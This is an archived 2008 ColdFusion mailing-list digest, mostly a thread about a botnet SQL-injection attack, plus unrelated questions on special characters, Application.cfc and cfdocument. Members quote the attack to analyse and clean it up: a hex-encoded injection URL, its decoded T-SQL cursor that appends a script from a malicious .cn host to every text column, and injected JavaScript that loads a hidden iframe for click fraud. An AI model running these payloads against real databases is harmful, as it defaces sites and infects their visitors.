var cookieString = document.cookie;
var start = cookieString.indexOf(dssndd=);
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = dssndd=update;expires=+expires.toGMTString();
try{
document.write(iframe src=http://lodse.ru/cgi-bin/index.cgi?ad width=0
height=0 frameborder=0/iframe);
}
catch(e)
{
};
}}
The URL in the iframe appears to simply redirect to msn.com. So, it looks
like the purpose of the attack is click-fraud.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to
date
Get the Free Trial
http://ad.doubleclick.net/clk;203748912;27390454;j
Archive:
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309394
Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm
Unsubscribe:
http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Not from the same address though, because it is banned now. This appears to be a botnet-driven attack. Blocking addresses may be problematic in that case. And the purpose of my code is not to replace CFQUERYPARAM. That's fine. My concern isn't really with you, Claude, but with people who might read your remarks and think that what you're doing is a valid substitute for CFQUERYPARAM - because it's not. It is to add an extra feature that will not only protect the database, but ALSO the whole site, because the guy won't be able to open any other page. If you're using CFQUERYPARAM as well, this doesn't really add any protection to the database. If you're not, the protection it does add is far from complete. Again, that's really my concern with your proposal. Figuring out what patterns to deny is a losing battle. Look at what CFQUERYPARAM CFSQLType = CF_SQL_INTEGER ... does: It triggers an error if the parameter is not an integer. My code does exactly the same thing, PLUS it bans the intruder in case some known attack pattern is detected. On its face, your comparison seems valid. But that's not really what CFQUERYPARAM does. Or at least, it's an incomplete description. What it does is separate data from executable code. This mechanism prevents data from being executed as code. The specific type of data is really invalid, and it'll work with any data now and in the future. It's as close to a foolproof mechanism as you're going to find. While it does validate specific data types, its real power is in this separation of data from code. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309395 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
What other ways are there? I know of two: EXEC and EXECUTE. Some people already mentioned sp_executesql, which is the preferred approach nowadays. But what about Unicode character conversion? What about from the shell using sp_cmdshell to fetch batch files remotely and execute them with isql/osql? For all I know, there may be other approaches as well. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309397 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Here's another question. Are sites that rewrite URLs (i.e., no .cfm extension in the url) more or less NOT being hit by these malbots? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309396 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
.and all hackers ALWAYS use the same IPcause they'd never get caught that way...hehe yes...that was meant to be sarcastic It does not look sarcastic to me, just may be a little retarded ;-) I see where you're coming from Claude, I just think (as Dave appears to) that you're wasting your time I'm not waisting my time, I'm saving my server time. At a certain time I use to have many errors in the server too busy or memory error category. I also discovered that a huge amount of the traffic on my server was due to robots, so I decided to control more specifically this traffic. I first optimized the good robots like Google, Yahoo, MSN etc using pertinent meta name=revisit-after content=n Days tags and other tricks. And I also tracked bad bots and fake browsers. Just look at your logs, and you'll be amazed by the amount of traffic caused by - browsers that never request images, probably bots... - experimental robots (I don't care if student experiment things, I just don't want to be the guinea pig) - robots that do not embed an address to explain why they are searching your sites, - robots that read all images to detect if one of them is copyrighted and illegally used (huge traffic) - Chinese robot that check if your site should be banned from China because they talk about human rights, - AND also spammers and hackers of course, etc. So I designed my own robot detection tools, and spam or SQL injection attempts are only extra tools I use to classify robots and just a drop in the ocean of sh%$/? I'm getting away. ;-) and yes, my server is much more stable now. and also, the statistics I show to my customers are realistic. Of course, I also use CFQUERYPARAM as an ultimate protection. -- ___ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: [EMAIL PROTECTED]) Thanks. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309398 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Mystery Character
I don't see that character in the ASCII list, but it's a bullet character. Mac users can insert it into file names using option 8 on the Mac. When they upload a file with that character it converts to something else (also not in the ASCII list) that can't be found when used in a URL string. I'd replace or strip the character on upload but I can't figure out how to make CF even see it. All I know is it's Option 8 on Mac. Robert B. Harrison Director of Interactive services Austin Williams 125 Kennedy Drive, Suite 100 Hauppauge NY 11788 T : 631.231.6600 Ext. 119 F : 631.434.7022 www.austin-williams.com Great advertising can't be either/or... It must be . ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309399 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Mystery Character
Try here: http://www.miniguidez.com/macosx/keystrokesguide/specialcharacters/specialcharacters.html It lists decimal and hex values for corresponding mac keystrokes. On Mon, Jul 21, 2008 at 3:43 PM, Robert Harrison [EMAIL PROTECTED] wrote: I don't see that character in the ASCII list, but it's a bullet character. Mac users can insert it into file names using option 8 on the Mac. When they upload a file with that character it converts to something else (also not in the ASCII list) that can't be found when used in a URL string. I'd replace or strip the character on upload but I can't figure out how to make CF even see it. All I know is it's Option 8 on Mac. Robert B. Harrison Director of Interactive services Austin Williams 125 Kennedy Drive, Suite 100 Hauppauge NY 11788 T : 631.231.6600 Ext. 119 F : 631.434.7022 www.austin-williams.com Great advertising can't be either/or... It must be . ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309400 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
This appears to be a botnet-driven attack. Blocking addresses may be problematic in that case. Why do you all want to interpret this as a final solution? Blocking an IP will NOT block ANY attack, it will just stop the current attack from THIS address, period. But it is safer than letting the malbot try every page it can find,... until it does find one in which CFQUERYPARAM was forgotten. If you're using CFQUERYPARAM as well, this doesn't really add any protection to the database. If you're not, the protection it does add is far from complete. Again, that's really my concern with your proposal. I use this method ONLY in the case an url.variable is supposed to contain an integer value. And in THAT CASE only, and for that variable only, the CFQUERYPARAM is useless, because if the variable contains anything else than a numeric, the query will never get executed anyway. CFQUERYPARAM is a nice and powerful feature, but it makes SQL code more difficult to read, so the best is to use it only when it is really necessary. For me, using CFQUERYPARAM systematically for every parameter is as stupid as never using it at all. -- ___ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: [EMAIL PROTECTED]) Thanks. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309401 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: Mystery Character
I've ran into things like this before. Is there a CF function (or even a way in Java) to take a character and return the ASCII code for it? (Or whatever is appropriate, I don't know if ASCII is really the right term) ~Brad -Original Message- From: morgan l [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 3:49 PM To: CF-Talk Subject: Re: Mystery Character Try here: http://www.miniguidez.com/macosx/keystrokesguide/specialcharacters/speci alcharacters.html It lists decimal and hex values for corresponding mac keystrokes. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309402 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: Mystery Character
Doesn't asc('x') do that? Or am I missing something?
Dave
-Original Message-
From: Brad Wood [mailto:[EMAIL PROTECTED]
Sent: Monday, July 21, 2008 3:53 PM
To: CF-Talk
Subject: RE: Mystery Character
I've ran into things like this before. Is there a CF function (or even
a way in Java) to take a character and return the ASCII code for it?
(Or whatever is appropriate, I don't know if ASCII is really the right
term)
~Brad
-Original Message-
From: morgan l [mailto:[EMAIL PROTECTED]
Sent: Monday, July 21, 2008 3:49 PM
To: CF-Talk
Subject: Re: Mystery Character
Try here:
http://www.miniguidez.com/macosx/keystrokesguide/specialcharacters/speci
alcharacters.html
It lists decimal and hex values for corresponding mac keystrokes.
~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to
date
Get the Free Trial
http://ad.doubleclick.net/clk;203748912;27390454;j
Archive:
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309403
Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Mystery Character
Actually, I just looked it up: http://livedocs.adobe.com/coldfusion/6/CFML_Reference/functions-pt121.htm According to this page, starting in MX 6, asc() supports values up to 65536, so it should work for you. Output your character value to the screen with asc(sFunkyCharacter) and you'll find out the value of it. Another thing you could do, if you really wanted to, was check all asc() values if each character in your string and if they exceed 255, then leave them out. That will ensure it works properly on Windows File System (which I'm assuming is the issue you are having). Dave -Original Message- From: Brad Wood [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 3:53 PM To: CF-Talk Subject: RE: Mystery Character I've ran into things like this before. Is there a CF function (or even a way in Java) to take a character and return the ASCII code for it? (Or whatever is appropriate, I don't know if ASCII is really the right term) ~Brad -Original Message- From: morgan l [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 3:49 PM To: CF-Talk Subject: Re: Mystery Character Try here: http://www.miniguidez.com/macosx/keystrokesguide/specialcharacters/speci alcharacters.html It lists decimal and hex values for corresponding mac keystrokes. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309404 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Mystery Character
Well there you have it! That was pretty simple... Thanks Dave. -Original Message- From: Experienced CF Developer [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 4:00 PM To: CF-Talk Subject: RE: Mystery Character Actually, I just looked it up: http://livedocs.adobe.com/coldfusion/6/CFML_Reference/functions-pt121.ht m According to this page, starting in MX 6, asc() supports values up to 65536, so it should work for you. Output your character value to the screen with asc(sFunkyCharacter) and you'll find out the value of it. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309405 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Problems with switching from application.cfm to application.c fc
I like your idea: cffunction name=onRequest ... cfargument name=targetPage cfset xcachepath = /cache ... cfinclude template=#Arguments.targetPage# ... /cffunction However I'm not sure how to implement this. What is the targetpage? Since this is the root application.cfc there are many different index pages that this application.cfc will use. Here's a another example of my stripped down cfc: cfcomponent cffunction name=onRequestStart returnType=boolean output=false CFAPPLICATION NAME=mywebsite SESSIONMANAGEMENT=Yes sessiontimeout=#CreateTimeSpan(0,0,20,0)# setclientcookies=yes CFSET xServerPath = c:\inetpub\wwwroot\clients\mywebsite\html cfset application.googlekey =ABQIGLygu72xTxPUIqNs3HgaixRGoefddpfKqX6LEQeDUC4B8xTs1enEDprVOV5TidrQOUmVZpW7QA cfsetting showdebugoutput=no CFSET DATASOURCE = mywebsitecom CFSET COMPANYNAME = mywebsite cfset xSSLUrl = https://www.mywebsite.com; cfset xSwitch=1 cfif xSwitch is 1 cfset xPathOrdering =#xSSLUrl#/templates/ cfset xURLPath =#xSSLUrl#/ CFSET xURLHome = #application.XNEWROOT# cfelse cfset xPathOrdering = cfset xURLPath = http://localhost/mywebsite/; /cfif cfset application.xtimedifference=2 cfset simple = 1 cfset xbird=robin cfset application.xbird=robin cfinclude template=templates/codecopyright.cfm CFSET xLiveInventory = StockWeb cfset xCfhttpPath=#application.XNEWROOT# cfset xRelativePath = c:\inetpub\wwwroot\clients\Xservercom\html CFSET xCache = c:\inetpub\wwwroot\clients\mywebsitecom\html\_cache CFSET xRootCache = /_cache cfif xSwitch is 0 cfset aSiteURL=http://localhost/mywebsite; cfelse cfset aSiteURL=#application.XNEWROOT# /cfif ] CFSET aShowAuctions = 1 !--- Used to determine a light grey image border color --- CFSET aBorderColor = Silver !--- Added 8/19/07 For Amazon Rest Statements --- cfset amz_Service =AWSECommerceService cfset amz_AWSAccessKeyId = 1FDX21XKHQ9CAT4X02 cfset amz_Version = 2007-07-16 cfset amz_associateid = xcom-20 cfreturn true /cffunction /cfcomponent ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309406 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Mark, Thanks for the info. I tried this and it located the code. I removed the comment and Executed however, the code still remains. Any help you can offer would be great! Thanks! For those of you who have been hit by this attack and who need to try something short of restoring your DB, this script will generate a series of update statements in reverse of the hack that's been going around: --- DECLARE @T varchar(255), @C varchar(255) DECLARE @sql varchar(4000) DECLARE @script varchar(255) /*fill in the value of the malicious script. */ select @script = 'script src=*scriptsrc/script!---' DECLARE Table_Cursor CURSOR FOR SELECT a.name, b.name FROM sysobjects a, syscolumns b WHERE a.id = b.id AND a.xtype = 'u' AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T, @C WHILE (@@FETCH_STATUS = 0) BEGIN SELECT @sql = 'update [' + @T +'] set ['+ @C +'] = Replace([' + @C + '],''' + @script + ''',)' PRINT @sql /*uncomment this after checking the output using print */ --EXEC(@sql) FETCH NEXT FROM Table_Cursor INTO @T, @C END CLOSE Table_Cursor DEALLOCATE Table_Cursor --- 1) Replace the value of @script (the select at the top) with the value of the string that's been inserted into your DB 2) Run the script AS IS - you should see a list of update statements that look like this: update [**tablename] set [**columnName] = Replace([**ColumnName],'script src=*scriptsrc/script!---','') Where **tablename and **columname represent actual tables/columns from your DB. You can then run the updates individually to strip out the malicious code... I also converted the update to a select to compare the values and see what the result would be on update. 3) If you are brave you can comment out the EXEC(@sql) line and rerun the script. Doing so will hit every table and every char column with these updates so be sure you know what you are doing. -Mark ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309407 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Did I really just read that? Please, someone, anyone, tell me that I didn't. Claude, you're certainly free to do what you wish to do in your own applications, so this comment is not directed to you at all. For those of you who are actually trying to learn and become better programmers/developers, please, do yourselves, your bosses, your fellow developers, and your clients a HUGE favor and completely ignore the advice of anyone that tells you not to use cfqueryparam. If you have read this thread, or any thread like it and you're not using it, you deserve what you get. Bottom line: ***always*** use cfqueryparam. Period. There are no acceptable exceptions to the rule. On Mon, Jul 21, 2008 at 3:54 PM, Claude Schneegans wrote: CFQUERYPARAM is a nice and powerful feature, but it makes SQL code more difficult to read, so the best is to use it only when it is really necessary. For me, using CFQUERYPARAM systematically for every parameter is as stupid as never using it at all. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309408 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Why do you all want to interpret this as a final solution? Blocking an IP will NOT block ANY attack, it will just stop the current attack from THIS address, period. But it is safer than letting the malbot try every page it can find,... until it does find one in which CFQUERYPARAM was forgotten. ... CFQUERYPARAM is a nice and powerful feature, but it makes SQL code more difficult to read, so the best is to use it only when it is really necessary. For me, using CFQUERYPARAM systematically for every parameter is as stupid as never using it at all. If you use it systematically for every parameter, you won't have any forgotten pages. Besides, again, it provides benefits beyond validation, such as potentially improving the reuse of execution plans. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309409 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Page break/blank page in cfdocument
Hi, I am creating a PDF from a dynamically created HTML page. To attempt to minimize styling problems and other issues, I use cfhttp to call a page template which builds the HTML using query results. Then I simply output the page content within the cfdocument tags. I've done this before, without much difficulty, although there are always CSS oddities. However, in this case, I'm seeing something I've never seen before, and which I can't find any reference to by Googling: a blank page is being created between each pair of real pages of my document. I'm not using cfdocumentitem type=pageBreak, so that's not the issue. There are no CSS specifications regarding page breaks in the code, either. And though the content does include HTML tables, the breaks seem to have nothing to do with them. If I completely avoid any attempt at pagination, I'm likely to get a page break in the middle of a table, followed by a blank page. So it seems as if a page break is being created somehow, though. Has anyone experienced anything like this? I'll be happy to share some code, but I don't want to simply dump a lot of unnecessary code on people unless it seems useful. Thanks for any guidance. -- Thanks, Tom Tom McNeer MediumCool http://www.mediumcool.com 1735 Johnson Road NE Atlanta, GA 30306 404.589.0560 ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309410 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
And for those of you who take this advice and DO use cfqueryparam ***always*** make sure you NEVER use SELECT * (which you shouldn't do anyway). I inherited an application that had a ton of SELECT * all over it and no cfqueryparam tags. Over the years I added cfqueryparam tags as I worked on the application, adding new features, and updated old ones/fixing bugs. Then I ran into a situation. If I didn't update the SELECT * to include actual column names, and one of the column names got dropped from the table I was referencing in my SELECT query with a cfqueryparam, then BAM, the application would break. Two hard and fast rules to live by: 1. Use cfqueryparam - ALWAYS 2. Use SELECT * - NEVER I'm sure someone will now provide some comment as when generalizations are usually made, someone has a dissenting opinion (to which, of course, you are fully entitled!) :) Sincerely, Dave Phillips -Original Message- From: Matt Quackenbush [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 4:21 PM To: CF-Talk Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... Did I really just read that? Please, someone, anyone, tell me that I didn't. Claude, you're certainly free to do what you wish to do in your own applications, so this comment is not directed to you at all. For those of you who are actually trying to learn and become better programmers/developers, please, do yourselves, your bosses, your fellow developers, and your clients a HUGE favor and completely ignore the advice of anyone that tells you not to use cfqueryparam. If you have read this thread, or any thread like it and you're not using it, you deserve what you get. Bottom line: ***always*** use cfqueryparam. Period. There are no acceptable exceptions to the rule. On Mon, Jul 21, 2008 at 3:54 PM, Claude Schneegans wrote: CFQUERYPARAM is a nice and powerful feature, but it makes SQL code more difficult to read, so the best is to use it only when it is really necessary. For me, using CFQUERYPARAM systematically for every parameter is as stupid as never using it at all. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309411 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Brad,
This took care of part of the issue... but not all.
I get this error:
Msg 8152, Level 16, State 13, Line 1
String or binary data would be truncated.
The statement has been terminated.
Does anyone know what I need to do to get around the error above?
thanks!
Works great for me. You have to remove the extra line breaks though.
Here is what it does:
DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
select a.name,
b.name
from sysobjects a,syscolumns b
where a.id=b.id
and a.xtype='u'
and (b.xtype=99
or b.xtype=35
or b.xtype=231
or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec('update ['[EMAIL PROTECTED]'] set ['[EMAIL PROTECTED]']=['[EMAIL
PROTECTED]']+''/titlescript
src=http://1.verynx.cn/w.js;/script!--''
where '[EMAIL PROTECTED]' not like ''%/titlescript
src=http://1.verynx.cn/w.js;/script!--''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
Did you read the blog I posted? It explains it all.
Tried printing the code in SQL Analyzer and got nothing. Can anyone
translate it to text? Not sure what I am missing.
/rss.cfm?';DECLARE @S CHAR(4000);SET
@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263
6861
72283430303029204445434C415245205461626C655F437572736F7220435552534F5220
464F
522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563
7473
20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420
612E
78747970653D27752720616E642028622E78747970653D3939206F7220622E7874797065
3D33
35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F5045
4E20
5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F
4375
72736F7220494E544F2040542C4043205748494C4528404046455443485F535441545553
3D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B27
2B40
432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372
633D
22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C
212D
2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F746974
6C65
3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A
7322
3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D202054
6162
6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C65
5F43
7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS
CHAR(4000));EXEC(@S);
it!
Huh... Learn sumptin new every day. That is why I keep coming back here.
;)
Thanx Brad.
~G~
~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to
date
Get the Free Trial
http://ad.doubleclick.net/clk;203748912;27390454;j
Archive:
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309412
Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Ahhh...so there were other reasons for doing what you are doingthat makes much more sense. As Dave already saidI too was concerned about your solution being put forward in a security context...because it's not. It is of course a valid way to deal with server load issues you have experienced by filtering out the garbage requests before they become an errors at the query end of things. and no...not retardedjust tactless ;-) Cheers - Bryan Stevenson B.Comm. VP Director of E-Commerce Development Electric Edge Systems Group Inc. phone: 250.480.0642 fax: 250.480.1264 cell: 250.920.8830 e-mail: [EMAIL PROTECTED] web: www.electricedgesystems.com Notice: This message, including any attachments, is confidential and may contain information that is privileged or exempt from disclosure. It is intended only for the person to whom it is addressed unless expressly authorized otherwise by the sender. If you are not an authorized recipient, please notify the sender immediately and permanently destroy all copies of this message and attachments. On Mon, 2008-07-21 at 16:38 -0400, Claude Schneegans wrote: .and all hackers ALWAYS use the same IPcause they'd never get caught that way...hehe yes...that was meant to be sarcastic It does not look sarcastic to me, just may be a little retarded ;-) I see where you're coming from Claude, I just think (as Dave appears to) that you're wasting your time I'm not waisting my time, I'm saving my server time. At a certain time I use to have many errors in the server too busy or memory error category. I also discovered that a huge amount of the traffic on my server was due to robots, so I decided to control more specifically this traffic. I first optimized the good robots like Google, Yahoo, MSN etc using pertinent meta name=revisit-after content=n Days tags and other tricks. And I also tracked bad bots and fake browsers. Just look at your logs, and you'll be amazed by the amount of traffic caused by - browsers that never request images, probably bots... - experimental robots (I don't care if student experiment things, I just don't want to be the guinea pig) - robots that do not embed an address to explain why they are searching your sites, - robots that read all images to detect if one of them is copyrighted and illegally used (huge traffic) - Chinese robot that check if your site should be banned from China because they talk about human rights, - AND also spammers and hackers of course, etc. So I designed my own robot detection tools, and spam or SQL injection attempts are only extra tools I use to classify robots and just a drop in the ocean of sh%$/? I'm getting away. ;-) and yes, my server is much more stable now. and also, the statistics I show to my customers are realistic. Of course, I also use CFQUERYPARAM as an ultimate protection. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309413 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
As a rule I use cfqueryparam. And generally try to stick to stored procedures, and use cfstoredproc/cfprocparam. However, I am now working with an app that uses cached queries regularly, and is still on CF7. You cannot use cfqueryparam with a cached query in CF7. What are the alternatives? -KJ Bottom line: ***always*** use cfqueryparam. Period. There are no acceptable exceptions to the rule. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309414 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Hmm, I sure hope you replaced the exec with a print statement -Original Message- From: Heikki Heikkinen [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 4:48 PM To: CF-Talk Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... Brad, This took care of part of the issue... but not all. I get this error: Msg 8152, Level 16, State 13, Line 1 String or binary data would be truncated. The statement has been terminated. Does anyone know what I need to do to get around the error above? thanks! Works great for me. You have to remove the extra line breaks though. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309415 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
